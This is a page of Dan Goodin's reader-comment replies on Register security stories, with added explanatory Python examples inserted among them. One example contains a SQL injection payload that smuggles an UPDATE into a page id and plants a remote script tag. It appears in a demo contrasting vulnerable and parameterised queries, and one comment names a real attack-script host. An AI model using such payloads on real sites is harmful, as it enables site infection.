* Posts by Dan Goodin

60 publicly visible posts • joined 9 Jul 2007


Security mandates aim to shore up shattered SSL system

Dan Goodin (Written by Reg staff)

Slight clarification

Fair enough. Caching means not *every* HTTPS request is logged. I've updated the article to reflect this.

Additionally, I'm adding the following response from security researcher Moxie Marlinspike, who continues to argue that under the current system, CAs "have a tremendous amount of insight into your browsing history."

His response in full is:

It's true that the OCSP check isn't done with *every* HTTPS request to a site, because the response is cached in the browser for a short time.

It's more like the CA is notified once per "session." If you think about a typical visit to paypal.com, it might involve several requests to the website in order to send or receive a payment. The CA will typically only be notified for the first request, not all of the subsequent ones within a session. For an average user, you can think of it in terms of a CA knowing how many times they sent or received a payment via the PayPal website, but not how many clicks it took them to do it.

In any case, the notion that CAs have a tremendous amount of insight into your browsing history is substantially true.

- moxie

Dan Goodin (Written by Reg staff)

Re: Who fact-checks these articles?

Vic,

When a web user visits an SSL-protected page, most browsers will check to see if the certificate has been revoked. This database is maintained by the CA who issued the certificate. The CA gets to see the IP address of the person trying to access the certificate.

This ability was underscored during the investigation into the DigiNotar breach. The investigators were able to determine that more than 300,000 people, mostly in Iran, encountered the fraudulently issued GMail certificate.

http://www.theregister.co.uk/2011/09/06/diginotar_audit_damning_fail/

I hope this answers the question you and several other readers have raised.
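The two points made above, Moxie's "once per session" caching behaviour and the fact that a CA's revocation logs record who asked about which certificate (the DigiNotar count), as an added model that is not code from the article or from Moxie Marlinspike. It assumes the browser keeps an OCSP response until its nextUpdate time and that the responder logs client IP, certificate serial and time; every site, serial, address and timestamp is constructed sample data.

```python
"""Model of what a CA's OCSP responder learns from ordinary HTTPS browsing.

Added illustration, not code from the article or from Moxie Marlinspike.
Assumptions: the browser keeps an OCSP response until its nextUpdate time
(so repeat visits within that window never reach the CA), and the responder
logs the client IP, the certificate serial asked about and the time. Every
site, serial, IP address and timestamp below is constructed sample data.
"""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Cert:
    site: str
    serial: int
    issuer: str
    ocsp_ttl: int          # seconds until the cached response's nextUpdate


@dataclass
class OcspResponder:
    """CA side: one log line per query ties a client IP to a site's cert."""
    issuer: str
    log: list = field(default_factory=list)

    def query(self, client_ip, serial, now):
        self.log.append((now, client_ip, serial))
        return "good"


@dataclass
class Browser:
    ip: str
    responders: dict
    cache: dict = field(default_factory=dict)   # (issuer, serial) -> expiry

    def https_request(self, cert, now):
        """Return 'cached' when the CA is not contacted, else the OCSP status."""
        key = (cert.issuer, cert.serial)
        expiry = self.cache.get(key)
        if expiry is not None and now < expiry:
            return "cached"
        status = self.responders[cert.issuer].query(self.ip, cert.serial, now)
        self.cache[key] = now + cert.ocsp_ttl
        return status


def simulate(requests):
    """Replay (time, client_ip, cert) triples, one browser per client, and
    return each CA's responder log: the record it could mine afterwards."""
    responders = {c.issuer: OcspResponder(c.issuer) for _, _, c in requests}
    browsers = {}
    for now, ip, cert in sorted(requests, key=lambda r: r[0]):
        if ip not in browsers:
            browsers[ip] = Browser(ip, responders)
        browsers[ip].https_request(cert, now)
    return {issuer: r.log for issuer, r in responders.items()}


def clients_seen_for_serial(log, serial):
    """The DigiNotar-style question: which client IPs asked about this cert?"""
    return {ip for _, ip, s in log if s == serial}


# Constructed sample: one user makes two PayPal "sessions" an hour apart,
# a second user visits once, and the first user also visits a bank whose
# certificate comes from a different CA.
PAYPAL = Cert("paypal.com", 0x1A2B, "CA-One", ocsp_ttl=3600)
BANK = Cert("bank.example", 0x3C4D, "CA-Two", ocsp_ttl=3600)
SAMPLE_REQUESTS = (
    [(t, "203.0.113.7", PAYPAL) for t in (0, 30, 95, 240, 600)]
    + [(t, "203.0.113.7", PAYPAL) for t in (7200, 7260, 7500)]
    + [(50, "198.51.100.9", PAYPAL), (400, "203.0.113.7", BANK)]
)


def ca_view_of_sample():
    return simulate(SAMPLE_REQUESTS)


if __name__ == "__main__":
    logs = ca_view_of_sample()
    for issuer, entries in logs.items():
        print(issuer, "saw", len(entries), "queries:", entries)
    print("clients who hit the PayPal cert:",
          clients_seen_for_serial(logs["CA-One"], PAYPAL.serial))
```

Nine requests to paypal.com produce three responder log lines: one per session per client. The CA still ends up with every client IP that touched the certificate, which is exactly the query the DigiNotar investigators ran.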

Adobe kills two actively exploited bugs in Reader

Dan Goodin (Written by Reg staff)

Re: WRONG

Robert,

You're right. 9.4.7 is the updated version, not 9.4.6 as previously reported. My apologies. The error has been corrected.

As for the RPC vulnerability, Adobe spokeswoman Wiebke Lips wrote in an email to The Register:

"Note: CVE-2011-4369 was reported after the security advisory (APSA11-04, http://www.adobe.com/support/security/advisories/apsa11-04.html) was published. The Adobe Reader and Acrobat team was able to provide a fix for this new issue as part of today's update. Note also that at this time, we are only aware of one instance of CVE-2011-4369 being used."

Army of 'socialbots' steal gigabytes of Facebook user data

Dan Goodin (Written by Reg staff)

Re: I'd be interested to know

auburnman,

In the report linked in the article, the researchers said they strongly encrypted the data and then permanently destroyed it once their project was completed.

Hackers break SSL encryption used by millions of sites

Dan Goodin (Written by Reg staff)

Correction -- Opera doesn't support TLS 1.2 by default

Dear readers,

Contrary to what was published earlier, Opera doesn't support TLS 1.2 by default. Our apologies for the error.

Adobe Reader 0day under active attack

Dan Goodin (Written by Reg staff)

Here it is

Reallydo,

The exploit code was written to install malware on Windows machines. The vulnerability itself is present in Reader for Unix and Mac OS X as well. Hence, they are vulnerable to attacks, but not the specific attack posted on the Contagio website.

Regards,

Dan Goodin

Adobe plans emergency patch for critical Reader bug

Dan Goodin (Written by Reg staff)

In a word: No

Anonymous Coward, the critical PDF vulnerability in the iPhone is of Apple's making, since it resides in PDF viewing software in Mobile Safari. The iPhone doesn't use Adobe Reader. The bugs are completely unrelated.

White House devs overlooked gaping Drupal vuln

Dan Goodin (Written by Reg staff)

@Anonymous Coward

For the record, "gaping" was used to suggest how easy it was for this bug to be spotted during a routine audit. A bug need not be easily exploitable for it to be extremely obvious.

Given the ability for Drupal XSS's to silently reset the super user password, I think it's fair to say this bug should have been caught long ago. It wasn't, even after the White House developers gave themselves a big pat on the back for releasing their own code that built off the same buggy module.

That's why the vuln is news and why The Reg stands by this story.

Carry on.

Google sues alleged work-at-home scammers

Dan Goodin (Written by Reg staff)

@@...malware? ...really?

x25,

This is an article reporting the contents of a lawsuit that was filed by Google. It contains numerous allegations Google has made about Pacific WebWorks. How is it "simply incredible" that I'd include that detail?

More importantly, what evidence do you have that this detail is incorrect?

Dan Goodin (Written by Reg staff)

@...malware? ...really?

The source of that information was the complaint Google filed in federal court.

Critical bug infests newer versions of Microsoft Windows

Dan Goodin (Written by Reg staff)

@s it or isn't it?

Anonymous coward, the bug is present in Windows 2007 RC. It's not present in Windows 2007 RTM.

Make sense?

Reg readers crack case of the $23 quadrillion overcharge

Dan Goodin (Written by Reg staff)

@Who is Stuart McConnachie?

AC, my bad for not inferring your comment correctly. I assure you McConnachie wasn't trying to take credit for the work of others.

As for your question about the statement, the copy that I've seen lists the fee to the very penny, as in $23,148,855,308,184,500.00.

McAfee false-positive glitch fells PCs worldwide

Dan Goodin (Written by Reg staff)

@James O'Brien

Hey James,

Not sure if your question is just bait. Assuming it isn't, here's the answer:

In journalism, as in many other aspects of life, there are real-time deadlines. So what to do when it's time to hit the publish button and you still haven't gotten an answer to your question? Do you:

a) lay out the fact that you indeed asked the company for their side of the story and didn't get a response by press time (i.e. an "immediate response")? or

b) not mention it at all and let readers wonder if you bothered to email the company at all?

No, companies aren't at journalists' beck and call. But they have a right to have their voice heard in stories that directly concern them. I was only trying to make sure it was clear I tried to give them that opportunity and for whatever reason had not gotten a response by press time.

The reason we say didn't "immediately respond" is to make it clear that there wasn't a whole lot of time between the time we asked and the time the story was published. In the case of this story, it was about 2 and a half hours.

Make sense?

At long last, internet's root zone to be secured

Dan Goodin (Written by Reg staff)

@Jay Daley

Here's the text of the NTIA's press release:

Commerce Department to Work with ICANN and VeriSign to Enhance the Security and Stability of the Internet’s Domain Name and Addressing System

For Immediate Release: June 3, 2009

NTIA Contact: Bart Forbes, [phone number and email address removed]

NIST Contact: Chad Boutin, [phone number and email address removed]

WASHINGTON — The U.S. Department of Commerce's National Telecommunications and Information Administration (NTIA) and National Institute of Standards and Technology (NIST) announced today that the two agencies are working with the Internet Corporation for Assigned Names and Numbers (ICANN) and VeriSign on an initiative to enhance the security and stability of the Internet. The parties are working on an interim approach to deployment, by year’s end, of a security technology -- Domain Name System Security Extensions (DNSSEC) -- at the authoritative root zone (i.e., the address book) of the Internet. There will be further consultations with the Internet technical community as the testing and implementation plans are developed.

The Domain Name and Addressing System (DNS) is a critical component of the Internet infrastructure. The DNS associates user-friendly domain names (e.g., www.commerce.gov) with the numeric network addresses (e.g., 170.110.225.163) required to deliver information on the Internet, making the Internet easier for the public to navigate. The accuracy, integrity, and availability of the data supplied by the DNS are essential to the operation of any system or service that uses the Internet. Over the years, vulnerabilities have been identified in the DNS protocol that threaten the authenticity and integrity of the DNS data. Many of these vulnerabilities are mitigated by DNSSEC, which is a suite of Internet Engineering Task Force (IETF) specifications for securing information provided by the DNS.

“The Internet is an ever-increasing means of communications and commerce, and this success is due in part to the Internet domain name and addressing system,” said Acting NTIA Administrator Anna M. Gomez. “The Administration is committed to preserving the stability and security of the DNS, and today’s announcement supports this commitment.”

"NIST has been an active participant within the international community in developing the DNSSEC protocols and has collaborated with various U.S. agencies in deploying DNSSEC within the .gov domain," said Cita M. Furlani, director of NIST's Information Technology Laboratory. "Signing the root will significantly speed up the global deployment of DNSSEC and enhance the security of the Internet.”

The NTIA in the U.S. Department of Commerce serves as the executive branch agency principally responsible for advising the President on communications and information policies. For more information about the NTIA, visit www.ntia.doc.gov.

As a non-regulatory agency, NIST promotes U.S. innovation and industrial competitiveness by advancing measurement science, standards and technology in ways that enhance economic security and improve our quality of life. For more information visit, www.nist.gov.

# # #

ARIN heads off IP address land grab

Dan Goodin (Written by Reg staff)

@Ian Braithwaite

You're right. It's a single customer allocation that's enough to support 4 billion versions of today's internet. Story corrected.

Olympic champ's mom sues Google for dead blogger's post

Dan Goodin (Written by Reg staff)

@cybersub

That was a typo on my part, which has now been fixed. My apologies.

Busted! Conficker's tell-tale heart uncovered

Dan Goodin (Written by Reg staff)

@Can someone point us to the NMAP signatures?

Folks,

Nmap creator Gordon Lyon, aka Fyodor, just emailed me to say he expects the Conficker update to be available within the next hour or so. For those who can't wait and don't mind mucking about with manual commands, the code is available at:

http://www.skullsecurity.org/blog/?p=209

Fyodor plans to announce availability of the patch at:

http://seclists.org/nmap-dev/2009/q1/index.html

Cheers,

Dan Goodin

A grim day for browser security at hacker contest

Dan Goodin (Written by Reg staff)

In defense of Charlie Miller

To those criticizing Charlie Miller for sitting on a Safari bug for more than 12 months, please consider the following:

A bug isn't the same thing as an exploit. While Miller discovered the bug more than a year ago, it was only recently that he figured out a way to exploit it so he could remotely execute code. Charlie told me he spent considerable time and effort making this happen. Meanwhile, he has paying clients and hard deadlines to meet. Under the circumstances, I don't think there's anything wrong with him dusting off an old bug when entering this contest.

TinyURL, your configs are showing

Dan Goodin (Written by Reg staff)

I stand corrected

Thanks to Jack and AC for setting me straight. Story has been corrected.

Proxy server bug exposes websites' private parts

Dan Goodin (Written by Reg staff)

@Java?

AC, unfortunately, the advisory is less than crystal clear on this.

It says: "To exploit this issue an attacker needs to execute active content (Java, Flash, Silverlight, etc) in the context of a web browser." Elsewhere it says, "Browser plugins (Flash, Java, etc) may enforce access controls on active content by limiting communication to the site or domain that the content originated from."

Not sure if the author really meant javascript. If anyone from CERT knows, please contact me.

How the Feds shook hands with an internet pedophile

Dan Goodin (Written by Reg staff)

@Alex King @Patrick Clark

"Maybe it's the shocking spelling in the article title. I too was expecting an insightful article about foot fetishism."

Cute, but reality is that for 305 million Americans, "pedophile" is the preferred spelling. Geez, and people accuse us yanks of living in a cocoon.

http://dictionary.reference.com/browse/pedophile

Feds: IT admin plotted to erase Fannie Mae

Dan Goodin (Written by Reg staff)

@"where sabotage by disgruntled employees is common"

Brent Weaver and others,

No doubt, the overwhelming majority of IT admins are honest, hard-working and law-abiding. But the fact remains that The Reg reports these types of stories with a fair amount of regularity. A small smattering includes:

http://www.theregister.co.uk/2008/09/05/88percent_it_admins_would_steal_sensitive_data/

http://www.theregister.co.uk/2009/01/07/it_admin_sentenced/

http://www.theregister.co.uk/2009/01/26/rogue_contractor_nt_gov_hacking/

http://www.theregister.co.uk/2008/06/26/fired_it_manager_rampage/

http://www.channelregister.co.uk/2007/12/04/admin_steals_consumer_records/

http://www.theregister.co.uk/2008/12/29/terry_childs_trial/

http://www.theregister.co.uk/2008/01/24/disgruntled_employee_silent_rampage/

http://www.theregister.co.uk/2007/04/20/terrorists_among_us_flee_flee/

Microsoft boasts 'out of box' IE8 clickjack protection

Dan Goodin (Written by Reg staff)

@gratutitous FUD

Anonymous coward, no conspiracy or FUD mangling going on here. Just disclosing that Maone is the creator of a product that competes with these Internet Explorer security measures and pointing out that security researchers with no dog in the fight agree with Maone.

Microsoft issues emergency IE patch as attacks escalate

Dan Goodin (Written by Reg staff)

@Details = good

EJ,

Thanks for the kind words. I've updated the article to include the following paragraph:

Attack strings in separate SQL injections include 17gamo.com/1.js. Researchers say the number of attack sites is too high to keep exhaustive lists, but Shadowserver is doing an admirable job here (http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210)

Someone else asked what platforms the hacked sites were running on. That information wasn't available, but in general SQL injections attack web applications that fail to sanitize user input rather than the underlying database. Many of the SQL injections in the past worked on a variety of database programs. (See http://www.theregister.co.uk/2008/05/14/asprox_attacks_websites/ and http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/)

Cheers,

Dang
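The point in the second paragraph above, that these mass injections exploit an application that splices request input into SQL rather than a flaw in the database engine, as an added example that is not code from The Register or from the researchers it cites. It uses Python's sqlite3 module; executescript() stands in for a database driver that runs stacked statements, as the targets of the 2008 attacks did. The table, rows and injected string are constructed, and the payload follows the pattern described (append a script tag to text columns) but points at the documentation-only host example.com.

```python
"""Why mass SQL injections are a web-application bug, not a database bug.

Added example, not code from The Register or from the researchers it cites.
The table, rows and injected string are constructed. The injected string
follows the pattern the article describes (append a <script src=...> tag to
every text column) but uses the documentation-only host example.com.
"""
import sqlite3

PAYLOAD_HOST = "http://example.com/1.js"   # stand-in for the real attack host

# What an attacker sends in place of a page id such as "1"
INJECTED_ID = ("1; UPDATE news SET body = body || '<script src=\""
               + PAYLOAD_HOST + "\"></script>'")


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT,"
                " body TEXT, views INTEGER DEFAULT 0)")
    con.executemany("INSERT INTO news (title, body) VALUES (?, ?)",
                    [("Quarterly results", "Profits up"),
                     ("Office move", "New address posted")])
    con.commit()
    return con


def bump_views_vulnerable(con, page_id):
    """Concatenation: the request parameter becomes part of the SQL program.
    sqlite3.execute() refuses stacked statements, so executescript() stands in
    for a driver that accepts them, as the targets of the 2008 attacks did."""
    con.executescript("UPDATE news SET views = views + 1 WHERE id = " + page_id)
    con.commit()


def bump_views_safe(con, page_id):
    """Bound parameter: the driver sends the value separately from the SQL
    text, so it can only ever be compared against id. (Rejecting non-integer
    input with int() before this point is the other half of the fix.)"""
    cur = con.execute("UPDATE news SET views = views + 1 WHERE id = ?",
                      (page_id,))
    con.commit()
    return cur.rowcount


def infected_rows(con):
    """Rows whose body now carries a script tag every visitor would load."""
    return con.execute(
        "SELECT COUNT(*) FROM news WHERE body LIKE '%<script%'").fetchone()[0]


def demo():
    """Run the same attacker input through both versions on fresh databases.
    Returns (rows infected via the vulnerable path, rows infected via the
    safe path, rows the safe UPDATE matched)."""
    vuln = make_db()
    bump_views_vulnerable(vuln, INJECTED_ID)
    safe = make_db()
    touched = bump_views_safe(safe, INJECTED_ID)
    return infected_rows(vuln), infected_rows(safe), touched


if __name__ == "__main__":
    print("infected (vulnerable, safe), rows matched by safe update:", demo())
```

The database does exactly what it is told in both cases; the difference is whether the application let the request parameter become part of the program. That is also why the same injection worked across database products: the bug lives in the page code.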

Dan Goodin (Written by Reg staff)

@Matt Ashworth

Good point. Story updated. Thanks for the suggestion.

Google Analytics — Yes, it is a security risk

Dan Goodin (Written by Reg staff)

@Andrew Ness

If you read the article, you clearly didn't comprehend it. Yes, The Reg uses Google Analytics, just like so many other web sites. But I assure you we don't link it to the admin section of our website for the reasons laid out above.

This point has been repeated umpteen times. Please finally take it in: It would be trivial for anyone with control of urchin.js to add scripts that steal session cookies, siphon the username and password entered and send them to any server of the attacker's choosing. With either of these two pieces of data, Change.gov has now been compromised. This is a risk that The Reg isn't willing to take, and it should be a risk that Change.gov isn't willing to take either.

Comprende?
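The audit a site owner would run to catch the risk described above, a third-party script loaded on a page that takes admin credentials, as an added example that is not code from The Register or from Change.gov. It uses only the Python standard library. The HTML is a constructed stand-in for an admin login page; the google-analytics.com host comes from the comment, the other hosts are made up. It also reports whether each foreign script carries an integrity attribute, a later mitigation than the 2008 discussion, because a script without one can be swapped by whoever controls that host at any time, which is the attack the comment describes.

```python
"""Find scripts an admin/login page loads from hosts the site does not control.

Added example, not code from The Register or from Change.gov. The HTML below
is a constructed stand-in for an admin login page; the hostnames are the one
named in the comment plus made-up ones. Subresource integrity postdates the
comment; it is reported because a foreign script without it can be replaced
at any time by whoever controls that host.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptFinder(HTMLParser):
    """Collect external scripts and note whether the page takes a password."""

    def __init__(self):
        super().__init__()
        self.scripts = []           # (src, has_integrity)
        self.password_field = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.scripts.append((a["src"], "integrity" in a))
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_field = True


def audit_page(html, own_hosts, page_host):
    """Return the page's foreign scripts as (src, host, has_integrity) and
    whether the page has a password field; both together are the problem."""
    p = ScriptFinder()
    p.feed(html)
    foreign = []
    for src, sri in p.scripts:
        host = urlsplit(src).hostname or page_host   # relative URL: own host
        if host not in own_hosts:
            foreign.append((src, host, sri))
    return {"password_field": p.password_field, "third_party_scripts": foreign}


# Constructed admin login page; the tracker snippet mimics the urchin.js era.
SAMPLE_ADMIN_PAGE = """<html><head><title>Admin login</title>
<script src="/js/admin.js"></script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-0000000-0"; urchinTracker();</script>
<script src="https://cdn.example.net/lib.js" integrity="sha384-constructed"></script>
</head><body><form method="post" action="/admin/login">
<input name="user"><input name="pass" type="password"></form></body></html>"""

OWN_HOSTS = {"change.gov", "www.change.gov"}   # assumed list of site-owned hosts


def audit_sample():
    return audit_page(SAMPLE_ADMIN_PAGE, OWN_HOSTS, "change.gov")


if __name__ == "__main__":
    report = audit_sample()
    if report["password_field"] and report["third_party_scripts"]:
        print("credentials page loads foreign script(s):")
        for src, host, sri in report["third_party_scripts"]:
            print(" ", src, "host:", host, "integrity:", sri)
```

Run this against the rendered HTML of every page under the admin section, not the templates, since analytics snippets are usually injected by a site-wide layout.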

New address spoofing flaw smudges Google's Chrome

Dan Goodin (Written by Reg staff)

story updated to correct link

ta

Kentucky commandeers world's most popular gambling sites

Dan Goodin (Written by Reg staff)

@Discrepancy

Luke,

You're right, it was Secretary Brown who said that, not the governor. Thanks for pointing out. Error corrected.

VPN security - if you want it, come and get it

Dan Goodin (Written by Reg staff)

This configuration of OpenVPN should *not* be blocked by most hotspots

To those complaining that OpenVPN is frequently blocked by hotspots, note that the configuration offered here uses port 443, which is open on the typical Wi-Fi network. This is exactly the configuration that JohnG discusses a few comments back.

CERT: Linux servers under 'Phalanx' attack

Dan Goodin (Written by Reg staff)

@James Penketh

Sorry, that was a typo. Story has been corrected to show the command is "cd".

Federal judge halts Defcon talk on subway card hacking

Dan Goodin (Written by Reg staff)

Presentation slides

AC, I've replaced the link to TG Daily with a link to an MIT site. As of Sunday, it was still hosting the slides.

Disgruntled admin gets 63 months for massive data deletion

Dan Goodin (Written by Reg staff)

@Keir Snelling

"At a guess, I'd say MS Remote Desktop. The client has a default setting that maps local printers to the terminal server. The client will advertise all of its local printers to the terminal server, and if the server has a matching driver, the printer will map. This is all recorder in the event log."

Remote Desktop is exactly correct. Should have included that detail in the story.

Hacker cops to $70k botnet rampage

Dan Goodin (Written by Reg staff)

@Anonymous Coward

Do you even think before spewing out such drivel? This won't be the first time Gregory King has spent time behind bars. Tami alluded to this, but you're too busy offering knee-jerk reactions to take this in. I suppose if someone inflicted tens of thousands of dollars in damage on your business you'd sit the chap down by a campfire and sing Kumbaya.

And since when is Greg King a "kid"? He's 21 years old. Do try to get your facts straight before posting, will you?

Dan Goodin (Written by Reg staff)

Re: Isn't this the guy...

Niall,

You must be thinking of the profile we did of a hacker nicknamed SoBe, who recently pleaded guilty to crimes committed while he was a juvenile. That article is at:

http://www.theregister.co.uk/2008/05/08/downfall_of_botnet_master_sobe_owns/

El Reg also did an earlier profile of Greg King that you can find at:

http://www.theregister.co.uk/2007/10/04/bot_herder_profile/

Cheers,

Dang

EFF pushes court to block unmasking of anonymous MySpace user

Dan Goodin (Written by Reg staff)

@What is free speech

Stranger: You're right: Megan Meier was 13, not 16. The error has been corrected. Thanks for bringing it to our attention.

TJX employee fired for exposing shoddy security practices

Dan Goodin (Written by Reg staff)

@BillPhollins RE: PCI Compliace

AC, I think you're confusing the TJX breach with a different breach. TJX secured its network with WEP, allowing the intruders easy access. TJX also held on to data well after it should have dumped it.

See:

http://www.theregister.co.uk/2007/10/24/tjx_breach_estimate_grows/

http://www.theregister.co.uk/2007/05/04/txj_nonfeasance/

Lifelock's fraud-prevention service takes more legal flak

Dan Goodin (Written by Reg staff)

Geez David Wiernicki

Where do you think CNN.com got the story? From the same AP reporter credited. Do feel free to think before commenting in the future.

Whitehats tackle The Great Botnet Dilemma

Dan Goodin (Written by Reg staff)

Contact them???

James Smith, et al.

Ever notice how slow ISPs are to deal with anything? Now multiply the delay by 25,000. I'm pretty sure TippingPoint has better things to do. As for popups and other types of notification: anytime you're running code on an infected machine, you're likely to get unintended consequences. Bottom line, contacting the infected users isn't practical. Anyone who believes otherwise should go ahead and contact each user himself (a list of the infected IP addresses is at http://dvlabs.tippingpoint.com/pub/pamini/kraken_uniq_ips.txt)

M. Burns, if you'd bother to look, you'd notice TippingPoint documented infected IPs and gave a deep dive analysis into their infiltration. What kind of proof do you want?

Modern 'primitive' could ease the pain of encrypting massive amounts of data

Dan Goodin (Written by Reg staff)

@Simon Whitehouse

Ever heard of key signing parties? Even with asymmetrical schemes, there is a need to securely exchange public keys. If a bad guy fools me into using the wrong public key to encrypt a message, the entire system fails.

So yes, an organization of 1,000 people still needs to figure out a way to securely distribute each public key to each of its colleagues, and if you do the math, that's very close to 1 million exchanges.

Wikipedia-reading boffins jimmy keyless door to entire universe

Dan Goodin (Written by Reg staff)

@Minor nit

R Callan,

Here in San Francisco, that's how meter is spelled . . . or is it spelt?

UK teen is world's youngest certified ethical hacker (maybe)

Dan Goodin (Written by Reg staff)

Story corrected

Hey Anonymous Coward,

Due to incorrect information supplied to The Register, we got the name of the university wrong in an earlier version of the story. The article has been updated. Thanks for pointing out the mistake.

Mass web infection leaves researcher scratching her head

Dan Goodin (Written by Reg staff)

@Whew, thought it was a serious threat

Jimmy,

Kindly read the article. Many if not all of the servers are running Apache.

Apple keeps critical security fixes to itself

Dan Goodin (Written by Reg staff)

Incorrect?

Many thanks to all the readers who are weighing in. I've just updated the story to respond to comments that there are inaccuracies.

Rogue servers point users to impostor sites

Dan Goodin (Written by Reg staff)

Sorry about the confusion

Based on the number of comments saying the article is confusing, it's obvious we could have done a better job explaining things. Essentially, XXX is correct when writing:

"This article is about a CLIENT vulnerability!

"The malware is changing the DNS setting at the CLIENT (Windows) to make the CLIENT query the WRONG DNS server. You can secure your DNS server to the point of unplugging it and locking it in a bank vault 5 miles underground and it won't fix this problem. All of the servers are functioning as intended and designed (including the "bad" ones).

"Sure, there are DNS server vulnerabilities (some highlighted above) but THIS IS NOT ONE OF THEM.

"The malware ... typically involved a single line of code"

"Only Microsoft can fix this, not the sysadmins for 17,000,000 DNS servers."

The client vulnerability generally works by changing a single registry setting, rather than altering a victim's hosts file. During any given week while the study was being conducted, the researchers found hundreds of URLs pointing to exploits.

The questions about recursion and authoritative, vs forwarding DNS servers are beyond my ken, I'm afraid, so I won't touch them.
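A triage check for the client-side problem described above, as an added example that is not code from The Register or from the researchers. The comment only says the malware changes "a single registry setting"; the key path used here is the standard per-interface DNS location on Windows and is this example's assumption about which setting is meant. The exported registry lines, interface names and addresses (RFC 5737 documentation ranges) are constructed.

```python
"""Flag Windows interfaces whose static NameServer points at untrusted resolvers.

Added example, not code from The Register or from the researchers. The
comment says only that "a single registry setting" is changed; the key path
below (HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces)
is the standard per-interface DNS location on Windows and is this example's
assumption. The .reg lines, interface names and addresses are constructed.
"""
import re

SAMPLE_REG_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1111-AAAA}]
"DhcpNameServer"="192.0.2.1"
"NameServer"=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2222-BBBB}]
"DhcpNameServer"="192.0.2.1"
"NameServer"="203.0.113.53,203.0.113.54"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{3333-CCCC}]
"NameServer"="192.0.2.2"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>[^"]*)"$')


def parse_reg_export(text):
    """Return {key_path: {value_name: value}} for a .reg style export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = m.group("value")
    return keys


def rogue_resolvers(keys, trusted):
    """Interfaces where a static NameServer overrides DHCP with an address
    outside the trusted set. An empty or trusted static value is fine; a
    foreign one is the symptom the article's malware leaves behind."""
    findings = []
    for path, values in keys.items():
        if "\\Tcpip\\Parameters\\Interfaces\\" not in path:
            continue
        static = [s for s in re.split(r"[ ,]+", values.get("NameServer", "")) if s]
        bad = [s for s in static if s not in trusted]
        if bad:
            findings.append((path.rsplit("\\", 1)[1], bad))
    return findings


TRUSTED = {"192.0.2.1", "192.0.2.2"}   # assumed corporate resolvers


def check_sample():
    return rogue_resolvers(parse_reg_export(SAMPLE_REG_EXPORT), TRUSTED)


if __name__ == "__main__":
    for iface, servers in check_sample():
        print("interface", iface, "uses untrusted resolvers:", ", ".join(servers))
```

Because the change is on the client, this is what to run on the endpoints; as the quoted reader says, nothing on the DNS server side will show it.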

Rove investigator erases his PCs - to kill computer virus

Dan Goodin (Written by Reg staff)

Bloch is a Republican

"Bloch is a DEMOCRAT investigating the Bush White House! The wipe happened maybe because HE is being investigated?"

Actually, Bloch is a Bush-appointed Republican.

California gov site invaded by smut and malware again

Dan Goodin (Written by Reg staff)

No harm in viewing Google searches

AC2: Calm down. There is no harm in clicking on the links in the Reg story. They simply take you to a Google page and run a search that shows links to the infected pages. Heck, even clicking on the search results themselves doesn't install malware so long as you don't click yes to popups that ask if they can install software on your machine.

Just to make things extra clear, I've updated the story to say "safe to click if you don't mind "porn" in your url, but you probably shouldn't click on any of search results."

Leopard security bug puts Mail users at risk

Dan Goodin (Written by Reg staff)

@guess it does not effect everyon

"I'm using Leopard 10.5.1. I ran the heise email check and tried to open the attachment, quickview showed nothing, so I clicked on the email attachment and got the standard security warning:-

“Heise.jpg” may be an application. It was attached to a mail message and will be opened by Terminal. Are you sure you want to open it?"

Wonder what version of Leopard he was using? A pre-final?"

Hey Derek,

Thanks very much for writing. As noted in the article, the warning fails to run "about 90 percent of the time," with little understanding as to what causes it to display in some cases and not in others.

I've yet to install Leopard on my MacBook Pro, so I can't test Schmidt's demo. I'd be eager to hear the results other Leopard users get.

Monster.com attack puts users at risk (again)

Dan Goodin (Written by Reg staff)

Updated

Story updated to reflect comment from Monster.com representatives.

Thumb twiddling Mozilla promises fix for privacy-biting bug

Dan Goodin (Written by Reg staff)

@Mac or Windows or both?

Anonymous Coward,

Good question. According to Mozilla, Linux, Mac and Windows versions of Firefox are vulnerable. We've updated our story to reflect this.

Coming to a Windows PC near you: 4 critical security updates

Dan Goodin (Written by Reg staff)

you're right

Indeed, it is advance notice. Thanks for spotting that.
